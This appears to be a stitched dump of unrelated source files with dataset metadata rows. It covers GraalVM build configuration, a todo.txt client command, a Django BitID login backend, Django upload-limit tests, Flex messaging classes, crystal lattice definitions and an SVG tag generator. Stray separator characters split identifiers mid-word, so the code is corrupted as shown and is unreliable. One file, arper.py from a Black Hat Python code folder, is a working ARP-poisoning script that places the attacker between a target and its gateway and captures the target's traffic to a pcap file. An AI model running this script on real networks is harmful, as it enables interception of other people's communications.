is_sdk_launcher=True,
is_polyglot=True,
)],
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmTool(
suite=_suite,
name='Polybench Instruments',
short_name='pbi',
dir_name='pbi',
license_files=[],
third_party_license_files=[],
dependencies=['Truffle', 'Polybench Launcher'],
truffle_jars=['vm:POLYBENCH_INSTRUMENTS'],
support_distributions=['vm:POLYBENCH_INSTRUMENTS_SUPPORT'],
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmLanguage(
suite=_suite,
name='Polyglot Microbenchmark Harness',
short_name='pmh',
dir_name='pmh',
license_files=[],
third_party_license_files=[],
dependencies=['Truffle', 'Polybench Launcher'],
truffle_jars=['vm:PMH'],
support_distributions=['vm:PMH_SUPPORT'],
installable=False,
))
polybench_benchmark_methods = ["_run"]
# pylint: disable=line-too-long
ce_components = ['bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'svml', 'tfl', 'tflm', 'vvm']
ce_win_complete_components = ['bnative-image-configure', 'bpolyglot', 'cmp', 'cov', 'dap', 'ejvm', 'gu', 'gvm', 'gwa', 'icu4j', 'ins', 'insight', 'insightheap', 'java', 'js', 'lg', 'libpoly', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'njs', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_aarch64_complete_components = ce_win_complete_components + ['llp', 'llrc', 'llrl', 'llrn', 'rby', 'rbyl', 'svml']
ce_darwin_complete_components = ce_aarch64_complete_components + ['pyn', 'R', 'bRMain', 'pynl']
ce_complete_components = ce_darwin_complete_components + ['ellvm']
ce_ruby_components = ['cmp', 'cov', 'dap', 'gvm', 'ins', 'insight', 'insightheap', 'lg', 'llp', 'llrc', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'pro', 'rby', 'rbyl', 'rgx', 'sdk', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_python_components = ['bgraalvm-native-binutil', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgu', 'sjsvm', 'blli', 'bnative-image', 'bnative-image-configure', 'bpolybench', 'bpolyglot', 'cmp', 'cov', 'dap', 'dis', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llp', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'nju', 'njucp', 'pbm', 'pmh', 'poly', 'polynative', 'pro', 'pyn', 'pynl', 'rgx', 'sdk', 'snative-image-agent', 'snative-image-diagnostics-agent', 'spolyglot', 'svm', 'svml', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_fastr_components = ['R', 'bRMain', 'bgraalvm-native-binutil', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgu', 'sjsvm', 'blli', 'bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lg', 'libpoly', 'llp', 'llrc', 'llrl', 'llrn', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svml', 'svmnfi', 'tfl', 'tflm', 'vvm']
ce_no_native_components = ['bgu', 'sjsvm', 'blli', 'bgraalvm-native-clang', 'bgraalvm-native-clang++', 'bgraalvm-native-ld', 'bgraalvm-native-binutil', 'bnative-image', 'bnative-image-configure', 'bpolyglot', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'insight', 'insightheap', 'js', 'lsp', 'nfi-libffi', 'nfi', 'ni', 'nic', 'nil', 'polynative', 'pro', 'rgx', 'sdk', 'llrc', 'llrn', 'llrl', 'snative-image-agent', 'snative-image-diagnostics-agent', 'spolyglot', 'svm', 'svmnfi', 'svml', 'tfl', 'tflm', 'libpoly', 'poly', 'vvm']
mx_sdk_vm.register_vm_config('ce', ['insight', 'insightheap', 'cmp', 'cov', 'dap', 'gu', 'gvm', 'icu4j', 'ins', 'js', 'lg', 'libpoly', 'lsp', 'nfi-libffi', 'nfi', 'poly', 'bpolyglot', 'polynative', 'pro', 'rgx', 'sdk', 'spolyglot', 'svm', 'svmnfi', 'tfl', 'tflm', 'vvm'], _suite, env_file='ce-win')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite, env_file='ce-aarch64')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite, env_file='ce-darwin')
mx_sdk_vm.register_vm_config('ce', ce_components, _suite)
mx_sdk_vm.register_vm_config('ce', ce_components + ['njs'], _suite, dist_name='ce', env_file='ce-nodejs')
mx_sdk_vm.register_vm_config('ce', ce_ruby_components, _suite, dist_name='ce-ruby', env_file='ce-ruby')
mx_sdk_vm.register_vm_config('ce', ce_win_complete_components, _suite, dist_name='ce-win-complete')
mx_sdk_vm.register_vm_config('ce', ce_aarch64_comp |
vdrey/Toolbox | Python/BHP/BHP-Code/BHP-Code/Chapter4/arper.py | Python | mit | 2,682 | 0.020507 | from scapy.all import *
import os
import sys
import threading
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
poisoning = True
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print "[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
def poi | son_target(gateway_ip,gateway_mac,target_ip,target_mac):
global poisoning
poison_target = ARP( | )
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "[*] ARP poison attack finished."
return
# set our interface
conf.iface = interface
# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
except KeyboardInterrupt:
pass
finally:
# write out the captured packets
print "[*] Writing packets to arper.pcap"
wrpcap('arper.pcap',packets)
poisoning = False
# wait for poisoning thread to exit
time.sleep(2)
# restore the network
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
|
MinchinWeb/topydo | topydo/commands/DepriCommand.py | Python | gpl-3.0 | 1,906 | 0.001049 | # Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <me@bramschoenmakers.nl>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from topydo.lib.MultiCommand import MultiCommand
from topydo.lib.PrettyPrinterFilter import PrettyPrinterNumbers
class DepriCommand(MultiCommand):
def __init__(self, p_args, p_todolist,
p_out=lambda a: None,
p_err=lambda a: None,
p_prompt=lambda a: None):
super(DepriCommand, self).__init__(
p_args, p_todolist, p_out, p_err, p_prompt)
def _execute_multi_specific(self):
self.printer.add_filter(PrettyPrinterNumbers(self.todol | ist))
for todo in self.todos:
if todo.priority() != None:
self.todolist.set_priority(todo, None)
self.out("Priority removed.")
self.out(self.printer.print_todo(todo))
def usage(self):
return """\
Synopsis: depri <NUMBER1> [<NUMBER2> ...]
depri [-x] -e <EXPRESSION>
"""
def help(self):
return """Removes the priority of the given todo item | (s).
It is also possible to deprioritize items as complete with an expression using
the -e flag. Use -x to also process todo items that are normally invisible
(with the 'ls' subcommand).
"""
|
manuelzs/django-bitid | djbitid/backends.py | Python | mit | 2,846 | 0.004216 | from django.core.exceptions import ObjectDoesNotExist
from django.conf import settings
from django.contrib.auth.models import User
from pybitid import bitid
from models import Nonce
class BitIdBackend(object):
USE_TESTNET_DEFAULT = False
def authenticate(self, bitid_uri=None, callback_uri=None,
signature=None, address=None, errors=[]):
if bitid_uri is None or callback_uri is None or signature is None or address is None:
errors.append('Invalid parameters')
return None
#
# Let's start by a bunch of validations
#
use_testnet = getattr(settings, 'BITID_USE_TESTNET', self.USE_TESTNET_DEFAULT)
# Checks the address
if not bitid.address_valid(address, use_testnet):
errors.append("Address is invalid or not legal")
return None
# Checks the bitid uri
if not bitid.uri_valid(bitid_uri, callback_uri):
errors.append("BitID URI is invalid or not legal")
return None
# Checks the signature
if not bitid.signature_valid(address, signature,
bitid_uri, callback_uri,
use_testnet):
errors.append("Signature is incorrect")
return None
# Checks the nonce
nid = bitid.extract_nonce(bitid_uri)
# Tries to retrieve the nonce from db
try:
nonce = Nonce.objects.get(nid=nid)
except ObjectDoesNotExist:
errors.append("NONCE is illegal")
return None
if nonce.has_expired():
nonce.delete()
errors.append("NONCE has expired")
return None
#
# So good so far, everything seems ok
# It's time to check if we have a sign out or a sign in
#
# Checks if a user with the given address has already been registered in db (sign in)
try:
user = User.objects.get(username=address)
except ObjectDoesNotExist:
# Here, we have an important check to do in order to avoid flooding of the users db
# Let's check for a pr | oof of goodwill (@see pybitid_demo.services.fake_tx_db_service)
if not self.goodwill_check(address):
errors.append("Address is invalid or not legal")
return None
# Creates a new user and stores it in db
user = User.objects.create_user(username=address)
user.save()
# To finalize t | he authentication, let's set the user id in the nonce and update it in db
nonce.user = user
nonce.save()
return user
def goodwill_check(self, address):
"""
TODO Check to prevent flooding
"""
return True
|
koniiiik/django | tests/requests/test_data_upload_settings.py | Python | bsd-3-clause | 6,773 | 0.001329 | from io import BytesIO
from django.core.exceptions import RequestDataTooBig, TooManyFieldsSent
from django.core.handlers.wsgi import WSGIRequest
from django.test import SimpleTestCase
from django.test.client import FakePayload
TOO_MANY_FIELDS_MSG = 'The number of GET/POST parameters exceeded settings.DATA_UPLOAD_MAX_NUMBER_FIELDS.'
TOO_MUCH_DATA_MSG = 'Request body exceeded settings.DATA_UPLOAD_MAX_MEMORY_SIZE.'
class DataUploadMaxMemorySizeFormPostTests(SimpleTestCase):
def setUp(self):
payload = FakePayload('a=1&a=2;a=3\r\n')
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=12):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request._load_post_and_files()
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=13):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request._load_post_and_files()
class DataUploadMaxMemorySizeMultipartPostTests(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
''
]))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=10):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request._load_post_and_files()
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=11):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request._load_post_and_files()
def test_file_passes(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="file1"; filename="test.file"',
'',
'value',
'--boundary--'
''
]))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=1):
request._load_post_and_files()
self.assertIn('file1', request.FILES, "Upload file not present")
class DataUploadMaxMemorySizeGetTests(SimpleTestCase):
def setUp(self):
self.request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'CONTENT_LENGTH': 3,
})
def test_data_upload_max_memory_size_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=2):
with self.assertRaisesMessage(RequestDataTooBig, TOO_MUCH_DATA_MSG):
self.request.body
def test_size_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=3):
self.request.body
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_MEMORY_SIZE=None):
self.request.body
def test_empty | _content_length(self):
self.request.environ['CONTENT_LENGTH'] = ''
self.request.body
class DataUploadMaxNumberOfFieldsGet(SimpleTestCase):
def test_get_max_fields_exceeded(self):
with se | lf.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=1):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'QUERY_STRING': 'a=1&a=2;a=3',
})
request.GET['a']
def test_get_max_fields_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=3):
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'wsgi.input': BytesIO(b''),
'QUERY_STRING': 'a=1&a=2;a=3',
})
request.GET['a']
class DataUploadMaxNumberOfFieldsMultipartPost(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name1"',
'',
'value1',
'--boundary',
'Content-Disposition: form-data; name="name2"',
'',
'value2',
'--boundary--'
''
]))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_number_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=1):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
self.request._load_post_and_files()
def test_number_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=2):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=None):
self.request._load_post_and_files()
class DataUploadMaxNumberOfFieldsFormPost(SimpleTestCase):
def setUp(self):
payload = FakePayload("\r\n".join(['a=1&a=2;a=3', '']))
self.request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload,
})
def test_number_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=2):
with self.assertRaisesMessage(TooManyFieldsSent, TOO_MANY_FIELDS_MSG):
self.request._load_post_and_files()
def test_number_not_exceeded(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=3):
self.request._load_post_and_files()
def test_no_limit(self):
with self.settings(DATA_UPLOAD_MAX_NUMBER_FIELDS=None):
self.request._load_post_and_files()
|
anhstudios/swganh | data/scripts/templates/object/draft_schematic/instrument/shared_instrument_bandfill.py | Python | mit | 459 | 0.04793 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from | swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/instrument/shared_instrument_bandfill.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### | END MODIFICATIONS ####
return result |
lvella/tagmaker | tagmaker.py | Python | gpl-3.0 | 3,169 | 0.002841 | #!/usr/bin/python3
# Copyright 2013 Universidade Federal de Uberlândia
# Author: Lucas Clemente Vella <lucas.vella@i9nagi.ufu.br>
# Utility to batch create conference tags from CSV data and SVG template.
import os
import io
import os.path
import sys
import csv
import re
import subprocess
import itertools
import jinja2
parser = re.compile(r'Batch (?P<number>\d+):\n(?P<csv>(.*?,.*?\n)+)')
def parse_status(status_text):
number = 0
already_done = set()
for match in parser.finditer(status_text):
number = int(match.group('number'))
csv_buf = io.StringIO(match.group('csv'))
already_done.update(map(tuple, csv.reader(csv_buf)))
return number, already_done
def main():
try:
working_dir = sys.argv[1]
os.chdir(working_dir)
except IndexError:
pass # use current directory as working dir
except FileNotFoundError as e:
print(e, '\nUsage:\n {} [working_directory]\nIf working directory is not provided, current directory will be used instead.'.format(sys.argv[0]))
sys.exit(1)
template = jinja2.Template(open('template.svg', 'r').read())
reader = csv.reader(open('data.csv', 'r'))
variables = next(reader)
data = set(map(tuple, reader))
status = open('generated_status.txt', 'a+')
status.seek(0)
last_batch, already_done = parse_status(status.read())
batch_num = last_batch + 1
data -= already_done
if not data:
print('Nothing new to process, everything is in one of the batches.\nSee "generated_status.txt" file.')
sys.exit(0)
batch_path = 'batch{:03d}'.format(batch_num)
os.mkdir(batch_path)
workers = []
outnames = []
def write_out(base_name, text):
svg_name = base_name + '.svg'
pdf_name = base_name + '.pdf'
with open(svg_name, 'w') as output:
output.write(gen)
workers.append(subprocess.Popen(['inkscape', '-z', '-f={}'.format(svg_name), '-A={}.pdf'.format(base_name)]))
outnames.append(pdf_name)
for row in data:
kwargs = dict(zip(variables, row))
gen = template.render(**kwargs)
base_name = os.path.join(batch_path, ','.join(row).replace('/', '_'))
write_out(base_name, gen)
blank_tags = (8 - (len(data) % 8)) % 8
if blank_tags:
gen = template.render(**dict(zip(variables, itertools.repeat(''))))
write_out('blank', gen)
outnames += [outnames[-1]] * (blank_tags - 1)
listing_text = '\n'.join(map(','.join, data)) + '\n'
print("Processed:")
print(listing_text)
with open(os.path.join(batch_path, 'listing.txt'), 'w') as listing:
listing.write(listing_text)
status.seek(0, os.SEEK_END)
status.write('Batch {}:\n'.format(batch_num))
status.write(listing_text)
for w in workers:
w.wait()
group_cmd = | "pdfnup --suffix nup --nup '2x4' --paper a4paper --no-landscape --noautoscale true --frame true --outfile {} -- ".format(os.path.join(batch_path, 'to_print.pdf')) + ' '.join(map('"{}"'.format, outnames))
print( | group_cmd)
os.system(group_cmd)
print('Done.')
if __name__ == "__main__":
main()
|
jamesward-demo/air-quick-fix | AIRQuickFixServer/pyamf/flex/messaging.py | Python | apache-2.0 | 9,203 | 0.001087 | # Copyright (c) 2007-2008 The PyAMF Project.
# See LICENSE for details.
"""
Flex Messaging implementation.
This module contains the message classes used with Flex Data Services.
@see: U{RemoteObject on OSFlash (external)
<http://osflash.org/documentation/amf3#remoteobject>}
@author: U{Arnar Birgisson<mailto:arnarbi@gmail.com>}
@author: U{Thijs Triemstra<mailto:info@collab.nl>}
@author: U{Nick Joyce<mailto:nick@boxdesign.co.uk>}
@since: 0.1.0
"""
import pyamf
__all__ = [
'RemotingMessage',
'CommandMessage',
'AcknowledgeMessage',
'ErrorMessage'
]
class AbstractMessage(object):
"""
Abstract base class for all Flex messages.
Messages have two customizable sections; headers and data. The headers
property provides access to specialized meta information for a specific
message instance. The data property contains the instance specific data
that needs to be delivered and processed by the decoder.
@see: U{AbstractMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AbstractMessage.html>}
@ivar body: Specific data that needs to be delivered to the remote
destination.
@type body: C{mixed}
@ivar clientId: Indicates which client sent the message.
@type clientId: C{str}
@ivar destination: Message destination.
@type destination: C{str}
@ivar headers: Message headers. Core header names start with DS.
@type headers: C{dict}
@ivar messageId: Unique Message ID.
@type messageId: C{str}
@ivar timeToLive: How long the message should be considered valid and
deliverable.
@type timeToLive: C{int}
@ivar timestamp: Timestamp when the message was generated.
@type timestamp: C{int}
"""
#: Each message pushed from the server will contain this header identifying
#: the client that will receive the message.
DESTINATION_CLIENT_ID_HEADER = "DSDstClientId"
#: Messages are tagged with the endpoint id for the channel they are sent
#: over.
ENDPOINT_HEADER = "DSEndpoint"
#: Messages that need to set remote credentials for a destination carry the
| #: C{Base64} encoded credentials in this header.
REMOTE_CREDENTIALS_HEADER = "DSRemoteCredentials"
#: The request timeout value is set on outbound messages by services or
#: channels and the value controls how long the responder will wait for an
#: acknowledgement, result or fault response for the message | before timing
#: out the request.
REQUEST_TIMEOUT_HEADER = "DSRequestTimeout"
def __init__(self, *args, **kwargs):
self.body = kwargs.get('body', None)
self.clientId = kwargs.get('clientId', None)
self.destination = kwargs.get('destination', None)
self.headers = kwargs.get('headers', {})
self.messageId = kwargs.get('messageId', None)
self.timeToLive = kwargs.get('timeToLive', 0)
self.timestamp = kwargs.get('timestamp', 0)
def __repr__(self):
m = '<%s ' % self.__class__.__name__
for k, v in self.__dict__.iteritems():
m += ' %s=%s' % (k, v)
return m + " />"
class AsyncMessage(AbstractMessage):
"""
I am the base class for all asynchronous Flex messages.
@see: U{AsyncMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AsyncMessage.html>}
@ivar correlationId: Correlation id of the message.
@type correlationId: C{str}
"""
#: Messages that were sent with a defined subtopic property indicate their
#: target subtopic in this header.
SUBTOPIC_HEADER = "DSSubtopic"
def __init__(self, *args, **kwargs):
AbstractMessage.__init__(self, *args, **kwargs)
self.correlationId = kwargs.get('correlationId', None)
class AcknowledgeMessage(AsyncMessage):
"""
I acknowledge the receipt of a message that was sent previously.
Every message sent within the messaging system must receive an
acknowledgement.
@see: U{AcknowledgeMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/AcknowledgeMessage.html>}
"""
#: Used to indicate that the acknowledgement is for a message that
#: generated an error.
ERROR_HINT_HEADER = "DSErrorHint"
class CommandMessage(AsyncMessage):
"""
Provides a mechanism for sending commands related to publish/subscribe
messaging, ping, and cluster operations.
@see: U{CommandMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/CommandMessage.html>}
@ivar operation: The command
@type operation: C{int}
@ivar messageRefType: hmm, not sure about this one.
@type messageRefType: C{str}
"""
#: The server message type for authentication commands.
AUTHENTICATION_MESSAGE_REF_TYPE = "flex.messaging.messages.AuthenticationMessage"
#: This is used to test connectivity over the current channel to the remote
#: endpoint.
PING_OPERATION = 5
#: This is used by a remote destination to sync missed or cached messages
#: back to a client as a result of a client issued poll command.
SYNC_OPERATION = 4
#: This is used to request a list of failover endpoint URIs for the remote
#: destination based on cluster membership.
CLUSTER_REQUEST_OPERATION = 7
#: This is used to send credentials to the endpoint so that the user can be
#: logged in over the current channel. The credentials need to be C{Base64}
#: encoded and stored in the body of the message.
LOGIN_OPERATION = 8
#: This is used to log the user out of the current channel, and will
#: invalidate the server session if the channel is HTTP based.
LOGOUT_OPERATION = 9
#: This is used to poll a remote destination for pending, undelivered
#: messages.
POLL_OPERATION = 2
#: Subscribe commands issued by a consumer pass the consumer's C{selector}
#: expression in this header.
SELECTOR_HEADER = "DSSelector"
#: This is used to indicate that the client's session with a remote
#: destination has timed out.
SESSION_INVALIDATE_OPERATION = 10
#: This is used to subscribe to a remote destination.
SUBSCRIBE_OPERATION = 0
#: This is the default operation for new L{CommandMessage} instances.
UNKNOWN_OPERATION = 1000
#: This is used to unsubscribe from a remote destination.
UNSUBSCRIBE_OPERATION = 1
def __init__(self, *args, **kwargs):
AsyncMessage.__init__(self, *args, **kwargs)
self.operation = kwargs.get('operation', None)
#: Remote destination belonging to a specific service, based upon
#: whether this message type matches the message type the service
#: handles.
self.messageRefType = kwargs.get('messageRefType', None)
class ErrorMessage(AcknowledgeMessage):
"""
I am the Flex error message to be returned to the client.
This class is used to report errors within the messaging system.
@see: U{ErrorMessage on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/mx/messaging/messages/ErrorMessage.html>}
"""
#: If a message may not have been delivered, the faultCode will contain
#: this constant.
MESSAGE_DELIVERY_IN_DOUBT = "Client.Error.DeliveryInDoubt"
#: Header name for the retryable hint header.
#:
#: This is used to indicate that the operation that generated the error may
#: be retryable rather than fatal.
RETRYABLE_HINT_HEADER = "DSRetryableErrorHint"
def __init__(self, *args, **kwargs):
AcknowledgeMessage.__init__(self, *args, **kwargs)
#: Extended data that the remote destination has chosen to associate
#: with this error to facilitate custom error processing on the client.
self.extendedData = kwargs.get('extendedData', {})
#: Fault code for the error.
self.faultCode = kwargs.get('faultCode', None)
#: Detailed description of what caused the error.
self.faultDetail = kwargs.get('faultDetail', None)
#: A simple description of the error.
self.faultString = kwargs.get('fa |
pylada/pylada-light | src/pylada/crystal/binary.py | Python | gpl-3.0 | 2,322 | 0.004737 | ###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
""" Defines binary lattices. """
__docformat__ = "restructuredtext en"
__all__ = ['rock_salt', 'zinc_blende', 'wurtzite']
def rock_salt():
""" rock_salt lattice """
from pylada.crystal import Structure
return Structure(1, 0, 0,
0, 1, 0,
0, 0, 1,
scale=1, name='Rock-Salt' )\
.add_atom(0, 0, 0, 'A')\
.add_atom(0.5, 0.5, 0.5, 'B')
def zinc_blende():
""" zinc_blende lattice """
from pylada.crystal import Structure
return Structure(0, 0.5, 0.5,
0.5, 0, 0.5,
| 0.5, 0.5, 0,
scale=1, name='Zinc-Blende' )\
.add_atom(0, 0, 0, 'A')\
.add_atom(0.25, 0.25, 0.25, 'B')
def wurtzite():
""" wurtzite lattice """
from pylada.crystal import Structure
return Structure(0.5, 0.5, 0,
-0.866025, 0.866025, 0,
0, 0, 1,
| scale=1, name='Wurtzite' )\
.add_atom(0.5, 0.288675, 0, 'A')\
.add_atom(0.5, -0.288675, 0.5, 'A')\
.add_atom(0.5, 0.288675, 0.25, 'B')\
.add_atom(0.5, -0.288675, 0.75, 'B')
|
dannysellers/django_orders | tracker/views/workorder_views.py | Python | gpl-2.0 | 5,164 | 0.012393 | from django.template import RequestContext
from django.shortcuts import render_to_response, HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.contrib import messages
from django.core.urlresolvers import reverse
import re
import json
from ..models import WorkOrder, Shipment
@login_required
def work_orders (request, status = 'incomplete'):
context = RequestContext(request)
context_dict = dict()
open_orders = WorkOrder.objects.exclude(status = 4).exclude(status = 999)
finished_orders = WorkOrder.objects.filter(status = 4)
terminated_orders = WorkOrder.objects.filter(status = 999)
unmatched_orders = WorkOrder.objects.exclude(status = 999) \
.exclude(shipment__isnull = False)
header_list = ['Order ID', 'Shipment', 'Owner', 'Create Date', 'Status', '']
if status == 'incomplete':
context_dict['orders'] = open_orders
context_dict['count'] = open_orders.count()
elif status == 'complete':
context_dict['orders'] = finished_orders
header_list.pop() # Remove the blank column header over the Delete buttons
header_list.insert(3, 'Finish Date')
context_dict['count'] = finished_orders.count()
elif status == 'terminated':
context_dict['orders'] = terminated_orders
header_list.pop()
header_list.insert(4, 'Termination Date')
context_dict['count'] = terminated_orders.count()
elif status == 'unmatched':
context_dict['orders'] = unmatched_orders
context_dict['count'] = unmatched_orders.count()
else:
context_dict['orders'] = open_orders
context_dict['count'] = open_orders.count()
context_dict['status'] = status
context_dict['headers'] = header_list
return render_to_response('tracker/workorder_list.html', context_dict, context)
@login_required
def work_order_detail (request, id):
context = RequestContext(request)
context_dict = dict()
order = WorkOrder.objects.get(id = id)
